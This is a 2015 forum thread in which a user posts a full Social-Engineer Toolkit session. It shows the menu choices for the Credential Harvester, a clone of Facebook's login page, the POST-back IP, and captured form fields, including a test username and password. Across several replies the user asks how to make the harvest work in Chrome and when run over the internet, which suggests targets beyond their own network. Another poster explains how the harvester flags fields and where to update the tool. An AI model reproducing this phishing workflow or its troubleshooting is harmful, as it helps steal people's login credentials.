littlemule Posted February 4, 2015 Share Posted February 4, 2015 Can anybody help me with this, this attack has always work fine in the past when ive used it, but now its doing this when i use google chrome, when i used the windows explorer then everthing seems fine,,,,, Thanks 1) Java Applet Attack Method 2) Metasploit Browser Exploit Method 3) Credential Harvester Attack Method 4) Tabnabbing Attack Method 5) Man Left in the Middle Attack Method 6) Web Jacking Attack Method 7) Multi-Attack Web Method 8) Create or import a CodeSigning Certificate 99) Return to Main Menu set:webattack>3 The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack. The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone. The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality. 1) Web Templates 2) Site Cloner 3) Custom Import 99) Return to Webattack Menu set:webattack>2 [-] Credential harvester will allow you to utilize the clone capabilities within SET [-] to harvest credentials or parameters from a website as well as place them into a report [-] This option is used for what IP the server will POST to. [-] If you're using an external IP, use your external IP for this set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.73 [-] SET supports both HTTP and HTTPS [-] Example: http://www.thisisafakesite.com set:webattack> Enter the url to clone:http://www.facebook.com [*] Cloning the website: https://login.facebook.com/login.php [*] This could take a little bit... The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website. [*] Social-Engineer Toolkit Credential Harvester Attack [*] Credential Harvester is running on port 80 [*] Information will be displayed to you as it arrives below: 192.168.1.67 - - [04/Feb/2015 23:24:03] "GET / HTTP/1.1" 200 - [*] WE GOT A HIT! Printing the output: PARAM: __a=1 PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w PARAM: __req=1 PARAM: __rev=1587870 POSSIBLE USERNAME FIELD FOUND: __user=0 PARAM: lsd=AVqA1uQz PARAM: miny_encode_ms=3 PARAM: ph=V3 POSSIBLE USERNAME FIELD FOUND: q=Miny1~95~,"~,~","~":~0~.~":"~null~],["~login~",{"~php~323xo~",~click~":[~1423090709517~time_spent~ft~posts~":[["~time_spent_bit_array~tos_id~start_time~tos_array~","/~],"~tos_len~tos_seq~tos_cum~},~click_ref_logger~",["~981~act~1~","-","~r~","/",{"~user~":{},"~gt~":{}},~"],~script_path_change~source_path~":"/~source_token~ad976420~dest_path~dest_token~navigation~impression_id~cause~"},~1423090709533~ods~:~ms~page_id~qa~www~x0o534~1423092247919~568~2~1423090706224~15~559~237~unload~0v29~[{"~]],"~trigger~7~4~11~1423090706~1423090698~9~"},{"~325~b279a230~load~1423092244800~0vL8~253~1423092247915~email~bits~js_initialized~]},~1423092247925~]]}]~2E1DCAy1XCIyPQRGSCIyTz2LwUL2TxAWXz2MwYzAwZz2H-2yxAE_1w2DJMw1yJMx2xwFyKyK1A1B1CO1E1F1G2wx2OxAx1xwIVFBH1HMxAE1IG1J1KFBHy1LC1My1NzDw1OzDw1PzDw1QzDw1RC2C1S1TxAERGSCIyTz2KwUL2zxAWXz2IwYz1zwZz2J-1TxA2F2GC1U1V1WBNB1YB1Z2N1DCAy1XC1-yPQ1IG1JzDw1LzDw1N1KFBHy1OC1My1PzDw1QC2Py1RC2Q1S2RxAE_1w2SJ1_w1yJ2UxAw2VyKyK1A1B1CO1E1F1G2Ax2BxAx1xw1-VFBH1H1_xAE1U1V1WBNB1YB1ZGNB2WB2XL1z2Y2ZxA2- PARAM: ts=1423092247933 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. [*] WE GOT A HIT! Printing the output: PARAM: __a=1 PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w PARAM: __req=2 PARAM: __rev=1587870 POSSIBLE USERNAME FIELD FOUND: __user=0 PARAM: lsd=AVqA1uQz PARAM: ph=V3 POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"x0o534","posts":[["time_spent_bit_array",{"tos_id":"x0o534","start_time":1423092244,"tos_array":[15,0],"tos_len":9,"tos_seq":0,"tos_cum":4},1423092252924,0]],"trigger":"time_spent_bit_array"}] PARAM: ts=1423092252940 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. 192.168.1.67 - - [04/Feb/2015 23:24:26] "GET / HTTP/1.1" 200 - [*] WE GOT A HIT! Printing the output: PARAM: __a=1 PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w PARAM: __req=1 PARAM: __rev=1587870 POSSIBLE USERNAME FIELD FOUND: __user=0 PARAM: lsd=AVqA1uQz PARAM: ph=V3 POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"p4l5eo","posts":[["script_path_change",{"source_path":null,"source_token":null,"dest_path":"/login.php","dest_token":"ad976420","navigation":null,"impression_id":"b279a230","cause":"load"},1423092268014,0],["click_ref_logger",["0vL8",1423092271140,"act",1423092271139,0,"email","click","click","-","r","/",{"ft":{},"gt":{}},562,238,0,981,"p4l5eo","/login.php"],1423092271140,0],["ods:ms.time_spent.qa.www",{"time_spent.bits.js_initialized":[1]},1423092271161,0]],"trigger":"ods:ms.time_spent.qa.www"}] PARAM: ts=1423092271180 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. [*] WE GOT A HIT! Printing the output: PARAM: __a=1 PARAM: __dyn=7w86i3S2e4oK4pomXWo5O12wAxu13w PARAM: __req=2 PARAM: __rev=1587870 POSSIBLE USERNAME FIELD FOUND: __user=0 PARAM: lsd=AVqA1uQz PARAM: ph=V3 POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"p4l5eo","posts":[["time_spent_bit_array",{"tos_id":"p4l5eo","start_time":1423092268,"tos_array":[135,0],"tos_len":9,"tos_seq":0,"tos_cum":4},1423092276055,0]],"trigger":"time_spent_bit_array"}] PARAM: ts=1423092276071 [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. [*] WE GOT A HIT! Printing the output: PARAM: lsd=AVqA1uQz PARAM: display= PARAM: enable_profile_selector= PARAM: legacy_return=1 PARAM: profile_selector_ids= PARAM: trynum=1 PARAM: timezone=0 PARAM: lgnrnd=152349_xc4V PARAM: lgnjs=1423092268 POSSIBLE USERNAME FIELD FOUND: email=qwerty POSSIBLE PASSWORD FIELD FOUND: pass=12345 PARAM: default_persistent=0 PARAM: qsstamp=W1tbMTUsMjUsMzAsNDEsNDUsNTUsNzIsNzMsNzcsODksMTIxLDEyMywxNDUsMTk5LDIwMSwyMDgsMjE5LDIyNSwyNDIsMjYxLDI2MywyNjksMzAxLDMwNSwzMDgsMzIyLDM0NiwzOTYsNDI3LDQ0MSw0NjAsNDYzLDQ3Niw0ODAsNTEwLDUyMyw1NDEsNTUyLDU1NSw1NzMsNjI2LDcwM11dLCJBWmx2Vk94aC1GeUxtOXQ1RW81Y01aNjQtY0JmcEJwTGtIV3VXSXVtYlE5NG9FYTB3Tmt2SXZMeW5IRFZQcnlKQ0hhN0xWbUF5Z0FHY1pac1BXUDBFNUktVGNUeEk4WDNKajRLdk43dzNPSXh1dXdubDFhVDI0RTZ2MjVCRjZqRUdickJqV3pIWERFaURuVVVBRWxYSV9xckx0RnNTR3QtTmVwdmpZblpUQURCdkQzM2dXNW9kS0ducHEwd1pDQ2lvcm9VRDVCS1RCMERWRm5TNXlYVlhOTE5fVC1YY2ZacmVHNGhDX25VYzFaOTlRIl0= [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. [*] WE GOT A HIT! Printing the output: PARAM: [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT. Quote Link to comment Share on other sites More sharing options...
littlemule Posted February 4, 2015 Author Share Posted February 4, 2015 As soon as i start to type in the email address and password on the facebook page thats what it kicks out everytime????????????? Quote Link to comment Share on other sites More sharing options...
cooper Posted February 5, 2015 Share Posted February 5, 2015 I don't quite understand the problem based on your description. What are you expecting that you're not seeing? Quote Link to comment Share on other sites More sharing options...
littlemule Posted February 5, 2015 Author Share Posted February 5, 2015 Its the top half of the field, were it says POSSIBLE USERNAME FIELD FOUND: q=[{"user":"0","page_id":"x0o534","posts":[["time_spent_bit_array",{"tos_id":"x0o534","start_time":1423092244,"tos_array":[15,0],"tos_len":9,"tos_seq":0,"tos_cum":4},1423092252924,0]],"trigger":"time_spent_bit_array"}] It doesnt show the user or password, but if you look at the bottom half it will show the username and password only if i use the windows explorer and not google chrome Quote Link to comment Share on other sites More sharing options...
cooper Posted February 5, 2015 Share Posted February 5, 2015 This harvester is a pretty basic component when it comes to harvesting. You send name-value pairs to the server along with your request and if the name contains a word that's on the whitelist, it's marked as a HIT and the info in the request is displayed. The difference between Google and IE probably has a lot to do with Javascript support or even simply the fact that the server detected it as browser X and thus gave it something else to do which was easier to circumvent. Either way, it's not so much a problem with your setup. Quote Link to comment Share on other sites More sharing options...
littlemule Posted February 5, 2015 Author Share Posted February 5, 2015 If i changed my router for a different one would that make a difference? if not how do i get round it. Could you also tell me how to update java the best way or the best way to update set. Regards Quote Link to comment Share on other sites More sharing options...
cooper Posted February 5, 2015 Share Posted February 5, 2015 1. Don't think so. 2. No idea. Maybe someone else can chip in on that. 3. Just go to Oracle's download page, download and install. Easy peasy. 4. It's written right here. Grab git, clone set as described on the page and install (probably compile first. It'll be self-explanatory). Look for a readme or some such. Quote Link to comment Share on other sites More sharing options...
littlemule Posted February 25, 2015 Author Share Posted February 25, 2015 thanks for the help will try it. Quote Link to comment Share on other sites More sharing options...
littlemule Posted February 25, 2015 Author Share Posted February 25, 2015 Keep getting the same problem, when i do the attack on my network, you can see the username and password, but when i do it over the internet i get what ive shown above in previous post, When i do the atttack over the internet everything works fine until the username and password is sent through to my computer and as you can see its just a jumble of letters and numbers. Can anybody help? Cheers Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.